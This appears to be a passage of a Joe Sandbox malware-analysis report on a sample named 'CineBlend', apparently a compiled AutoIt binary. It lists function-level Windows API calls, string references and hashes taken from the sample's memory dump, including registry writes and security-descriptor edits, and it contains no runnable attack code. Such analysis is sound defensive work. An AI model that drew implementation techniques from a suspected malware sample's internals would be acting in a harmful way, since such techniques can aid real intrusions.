Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: d9257868ebc01f9d2317f232dbd06fcebd5305f8a8f4425d3a22718b5dca9171
Instruction ID: 4a06c416ad45718b953efbd5af94b0e61cc8c7da7d80a6c082465929600f02f7
Opcode Fuzzy Hash: d9257868ebc01f9d2317f232dbd06fcebd5305f8a8f4425d3a22718b5dca9171
Instruction Fuzzy Hash: 2CE1C0312182419FCB14EF28C59096AF7E6FF84314F1489AEF896973A1EB30ED45CB51

Function 00B42521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B425F8
GetSystemMetrics.USER32(00000007), ref: 00B42600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B4262B
GetSystemMetrics.USER32(00000008), ref: 00B42633
GetSystemMetrics.USER32(00000004), ref: 00B42658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B42675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B42685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B426B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B426CC
GetClientRect.USER32(00000000,000000FF), ref: 00B426EA
GetStockObject.GDI32(00000011), ref: 00B42706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B42711

Part of subcall function 00B419CD: GetCursorPos.USER32(?), ref: 00B419E1
Part of subcall function 00B419CD: ScreenToClient.USER32(00000000,?), ref: 00B419FE
Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000001), ref: 00B41A23
Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000002), ref: 00B41A3D

SetTimer.USER32(00000000,00000000,00000028,00B4199C), ref: 00B42738

Strings

AutoIt v3 GUI, xrefs: 00B426B0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e8bbddf524ac77ab9e8a50bcdd80be41f6347263cfd064a35bbfc37ae4759aa9
Instruction ID: b49b5af1724e42b1179c04494d75547cfea16bde3761cdbefc46653aaf4675ee
Opcode Fuzzy Hash: e8bbddf524ac77ab9e8a50bcdd80be41f6347263cfd064a35bbfc37ae4759aa9
Instruction Fuzzy Hash: 0CB19C35A0020A9FDB14DFA8DC95BEE7BF4FB48714F10415AFA46A72A0DB74E940DB50

Function 00BA16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA1A60
Part of subcall function 00BA1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A6C
Part of subcall function 00BA1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A7B
Part of subcall function 00BA1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BA14E7,?,?,?), ref: 00BA1A82
Part of subcall function 00BA1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA1775
GetLengthSid.ADVAPI32(?), ref: 00BA178C
GetAce.ADVAPI32(?,00000000,?), ref: 00BA17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA17E2
GetLengthSid.ADVAPI32(?), ref: 00BA17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00BA1801
HeapAlloc.KERNEL32(00000000), ref: 00BA1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA1829
CopySid.ADVAPI32(00000000), ref: 00BA1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18BA
HeapFree.KERNEL32(00000000), ref: 00BA18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18CA
HeapFree.KERNEL32(00000000), ref: 00BA18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA18DA
HeapFree.KERNEL32(00000000), ref: 00BA18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00BA18ED
HeapFree.KERNEL32(00000000), ref: 00BA18F4

Part of subcall function 00BA1ADF: GetProcessHeap.KERNEL32(00000008,00BA14FD,?,00000000,?,00BA14FD,?), ref: 00BA1AED
Part of subcall function 00BA1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00BA14FD,?), ref: 00BA1AF4
Part of subcall function 00BA1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00BA14FD,?), ref: 00BA1B03

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 2a6f3a39f83098a6e43627e11234b8d182dc8296c9f4c384a254d84c2f484eb9
Instruction ID: 7d5a0c8b8e3d53690ca7db0ac74cca0f436122d5f56fc98c5adb95961db9f844
Opcode Fuzzy Hash: 2a6f3a39f83098a6e43627e11234b8d182dc8296c9f4c384a254d84c2f484eb9
Instruction Fuzzy Hash: 60717AB2D0520ABBDF50DFA8DC44FAEBBB8FF45300F144666E955A7190EB349A05CB60

Function 00BCCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCCF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDDCD0,00000000,?,00000000,?,?), ref: 00BCCFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00BCD004
_wcslen.LIBCMT ref: 00BCD054
_wcslen.LIBCMT ref: 00BCD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00BCD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00BCD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00BCD2AD
RegCloseKey.ADVAPI32(?), ref: 00BCD2E1
RegCloseKey.ADVAPI32(00000000), ref: 00BCD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00BCD3C0

Strings

REG_EXPAND_SZ, xrefs: 00BCD02D
REG_QWORD, xrefs: 00BCD323
REG_SZ, xrefs: 00BCD0A4
REG_MULTI_SZ, xrefs: 00BCD155
REG_DWORD, xrefs: 00BCD264
REG_BINARY, xrefs: 00BCD373

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: c35d8dc4e31cd48141a385cb4bdf8752010a1f17516fdf5d296b6dfafb53bc7d
Instruction ID: 4d03f3c0d4507332cbf009ea34e7a64ea13b1937e8be92d5262aa553dcc1ce53
Opcode Fuzzy Hash: c35d8dc4e31cd48141a385cb4bdf8752010a1f17516fdf5d296b6dfafb53bc7d
Instruction Fuzzy Hash: A31237356042019FD714EF14C891F2ABBE5EF88714F1488ADF99A9B3A2CB35ED45CB81

Function 00BD13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00BD1462
_wcslen.LIBCMT ref: 00BD149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD14F0
_wcslen.LIBCMT ref: 00BD1526
_wcslen.LIBCMT ref: 00BD15A2
_wcslen.LIBCMT ref: 00BD161D

Part of subcall function 00B5FD52: _wcslen.LIBCMT ref: 00B5FD5D

Part of subcall function 00BA3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BA3547

Strings

COLLAPSE, xrefs: 00BD159D, 00BD15B8
GETITEMCOUNT, xrefs: 00BD16BA
ISCHECKED, xrefs: 00BD177D
UNCHECK, xrefs: 00BD17DA
GETTOTALCOUNT, xrefs: 00BD148E, 00BD14B3
CHECK, xrefs: 00BD1521, 00BD153C
SELECT, xrefs: 00BD17AD
GETTEXT, xrefs: 00BD1733
GETSELECTED, xrefs: 00BD16EA
EXISTS, xrefs: 00BD1618, 00BD1633
EXPAND, xrefs: 00BD1694

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: ad6430700cbda336c0572b93b55af90a0de07d015cadf6fab99c7544217067b0
Instruction ID: d6751dfb5cd27677ae03c10b9dcb43a2cd2cc93cc405f755854193926d7ee678
Opcode Fuzzy Hash: ad6430700cbda336c0572b93b55af90a0de07d015cadf6fab99c7544217067b0
Instruction Fuzzy Hash: D1E16D716087019FCB14EF28C45092AF7E2FF94314B14899EF8965B3A2EB31EE45CB91

Function 00BCD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
_wcslen.LIBCMT ref: 00BCD451
_wcslen.LIBCMT ref: 00BCD4C8
_wcslen.LIBCMT ref: 00BCD4FE
_wcslen.LIBCMT ref: 00BCD559
_wcslen.LIBCMT ref: 00BCD58F
_wcslen.LIBCMT ref: 00BCD5DF

Strings

HKCC, xrefs: 00BCD60C
HKCR, xrefs: 00BCD589, 00BCD58E
HKCU, xrefs: 00BCD62E
HKEY_CLASSES_ROOT, xrefs: 00BCD553, 00BCD558
HKEY_CURRENT_CONFIG, xrefs: 00BCD5D9, 00BCD5DE
HKLM, xrefs: 00BCD4F8, 00BCD4FD
HKEY_LOCAL_MACHINE, xrefs: 00BCD4C2, 00BCD4C7
HKEY_CURRENT_USER, xrefs: 00BCD61D
HKU, xrefs: 00BCD650
HKEY_USERS, xrefs: 00BCD63F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: ff8c7f789a5bb4c68ce50a232c5f91b1fe4a2cf4488a03b218f430be0604ca89
Instruction ID: d8a351b1b6b0bdba152d2e3cf961c8cd0e31c308499a38b6cc9fd20449cbe8dd
Opcode Fuzzy Hash: ff8c7f789a5bb4c68ce50a232c5f91b1fe4a2cf4488a03b218f430be0604ca89
Instruction Fuzzy Hash: C471C37A60052A8BCB109E6CCD51FBB33E1EB70758B2241BCF85697394EA35DD49C7A0

Function 00BD8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BD8DB5
_wcslen.LIBCMT ref: 00BD8DC9
_wcslen.LIBCMT ref: 00BD8DEC
_wcslen.LIBCMT ref: 00BD8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BD8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD6691), ref: 00BD8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BD8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BD8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BD8F5C
FreeLibrary.KERNEL32(?), ref: 00BD8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BD8F78
DestroyIcon.USER32(?,?,?,?,?,00BD6691), ref: 00BD8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BD8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BD8FB0

Strings

.icl, xrefs: 00BD8DC3
.exe, xrefs: 00BD8DE3
.dll, xrefs: 00BD8E06

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: eb678bc1aacdb06f23966cf92c69d2029e74932ab1309abe3632227cc889a228
Instruction ID: 473e7db1a5dda52d424bb45e58023e2d0cf0f1d4b38c047df77bf83b168e5076
Opcode Fuzzy Hash: eb678bc1aacdb06f23966cf92c69d2029e74932ab1309abe3632227cc889a228
Instruction Fuzzy Hash: 7A61EE71900615BAEB14DF64DC41BBEBBE8FF08B11F108596F915D62D1EF74AA80CBA0

Function 00BB48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00BB493D
_wcslen.LIBCMT ref: 00BB4948
_wcslen.LIBCMT ref: 00BB499F
_wcslen.LIBCMT ref: 00BB49DD
GetDriveTypeW.KERNEL32(?), ref: 00BB4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BB4ACC

Strings

open , xrefs: 00BB4A2A
set cd door , xrefs: 00BB4A6D
open, xrefs: 00BB4999, 00BB499E
type cdaudio alias cd wait, xrefs: 00BB4A46
close, xrefs: 00BB4943, 00BB495D
wait, xrefs: 00BB4A89
closed, xrefs: 00BB494D, 00BB4972, 00BB498B, 00BB49C3, 00BB49DC
close cd wait, xrefs: 00BB4AB7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 330558b2d47a2c1679773ca3ea9194759690c3969d9af78d1f04304d824f8b73
Instruction ID: f95c8184baafeed3925cddb84b70a8a47d9d82acc5f203b628c5b0862f45f051
Opcode Fuzzy Hash: 330558b2d47a2c1679773ca3ea9194759690c3969d9af78d1f04304d824f8b73
Instruction Fuzzy Hash: B271E3729082019FC714EF24C8809BBB7E4FF94758F1049ADF89597292EB71EE45CB91

Function 00BA6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00BA6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BA63A7
SetWindowTextW.USER32(?,?), ref: 00BA63BE
GetDlgItem.USER32(?,000003EA), ref: 00BA63D3
SetWindowTextW.USER32(00000000,?), ref: 00BA63D9
GetDlgItem.USER32(?,000003E9), ref: 00BA63E9
SetWindowTextW.USER32(00000000,?), ref: 00BA63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BA6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BA642A
GetWindowRect.USER32(?,?), ref: 00BA6433
_wcslen.LIBCMT ref: 00BA649A
SetWindowTextW.USER32(?,?), ref: 00BA64D6
GetDesktopWindow.USER32 ref: 00BA64DC
GetWindowRect.USER32(00000000), ref: 00BA64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00BA653A
GetClientRect.USER32(?,?), ref: 00BA6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00BA656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BA6596

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 609e043522b2c71661b19e90a6f9662b85b79418c9036a04a985678baa05b01e
Instruction ID: 39ced08e162f1e85b3fc9e4918dc56d07fd562da5ee8a08f89d7bf7652c4c082
Opcode Fuzzy Hash: 609e043522b2c71661b19e90a6f9662b85b79418c9036a04a985678baa05b01e
Instruction Fuzzy Hash: F1719A71904609AFDB20DFA8CE85BAEBBF5FF08704F140959E186A36A0DB71E944CB50

Function 00BC086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00BC0884
LoadCursorW.USER32(00000000,00007F8A), ref: 00BC088F
LoadCursorW.USER32(00000000,00007F00), ref: 00BC089A
LoadCursorW.USER32(00000000,00007F03), ref: 00BC08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00BC08B0
LoadCursorW.USER32(00000000,00007F01), ref: 00BC08BB
LoadCursorW.USER32(00000000,00007F81), ref: 00BC08C6
LoadCursorW.USER32(00000000,00007F88), ref: 00BC08D1
LoadCursorW.USER32(00000000,00007F80), ref: 00BC08DC
LoadCursorW.USER32(00000000,00007F86), ref: 00BC08E7
LoadCursorW.USER32(00000000,00007F83), ref: 00BC08F2
LoadCursorW.USER32(00000000,00007F85), ref: 00BC08FD
LoadCursorW.USER32(00000000,00007F82), ref: 00BC0908
LoadCursorW.USER32(00000000,00007F84), ref: 00BC0913
LoadCursorW.USER32(00000000,00007F04), ref: 00BC091E
LoadCursorW.USER32(00000000,00007F02), ref: 00BC0929
GetCursorInfo.USER32(?), ref: 00BC0939
GetLastError.KERNEL32 ref: 00BC097B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: fa214101f5cdb0a44b0d9a4ae40c8d0e99161d1b12858af16d42cd34c731aa47
Instruction ID: 3ab44255c70dbd231447c3077f2a772005d5173f9e0410986fd4e8a4e0fe1959
Opcode Fuzzy Hash: fa214101f5cdb0a44b0d9a4ae40c8d0e99161d1b12858af16d42cd34c731aa47
Instruction Fuzzy Hash: B84172B0D08319AADB109FBA8C89D6EBFE8FF04750B50456AE15CE7281DA78D901CF91

Function 00B60436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00B60436

Part of subcall function 00B6045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C1170C,00000FA0,08AB8DE6,?,?,?,?,00B82733,000000FF), ref: 00B6048C
Part of subcall function 00B6045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B82733,000000FF), ref: 00B60497
Part of subcall function 00B6045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B82733,000000FF), ref: 00B604A8
Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B604BE
Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B604CC
Part of subcall function 00B6045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B604DA
Part of subcall function 00B6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B60505
Part of subcall function 00B6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B60510

___scrt_fastfail.LIBCMT ref: 00B60457

Part of subcall function 00B60413: __onexit.LIBCMT ref: 00B60419

Strings

SleepConditionVariableCS, xrefs: 00B604C4
WakeAllConditionVariable, xrefs: 00B604D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B60492
InitializeConditionVariable, xrefs: 00B604B8
kernel32.dll, xrefs: 00B604A3

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 90787bc2988479a7131f23a43b327b144f69a5414f00eaa974a4c6933333947a
Instruction ID: ab8ea37d08d7ab685fc77e4f2ee68d13b4bdd3d5268b053ef3c33d78c0490b41
Opcode Fuzzy Hash: 90787bc2988479a7131f23a43b327b144f69a5414f00eaa974a4c6933333947a
Instruction Fuzzy Hash: 1D213B326657056BD7213BA6AC56B6B73E4EF05F61F0441A6FD02A33D0EFB88C408A94

Function 00BA3A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BA3AD9
_wcslen.LIBCMT ref: 00BA3B44

Strings

INSTANCE, xrefs: 00BA3D9F
REGEXPCLASS, xrefs: 00BA3BA1, 00BA3BB2
TEXT, xrefs: 00BA3DC8
NAME, xrefs: 00BA3C81, 00BA3C92
CLASSNN, xrefs: 00BA3B3F, 00BA3B50
CLASS, xrefs: 00BA3AD4, 00BA3AF1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
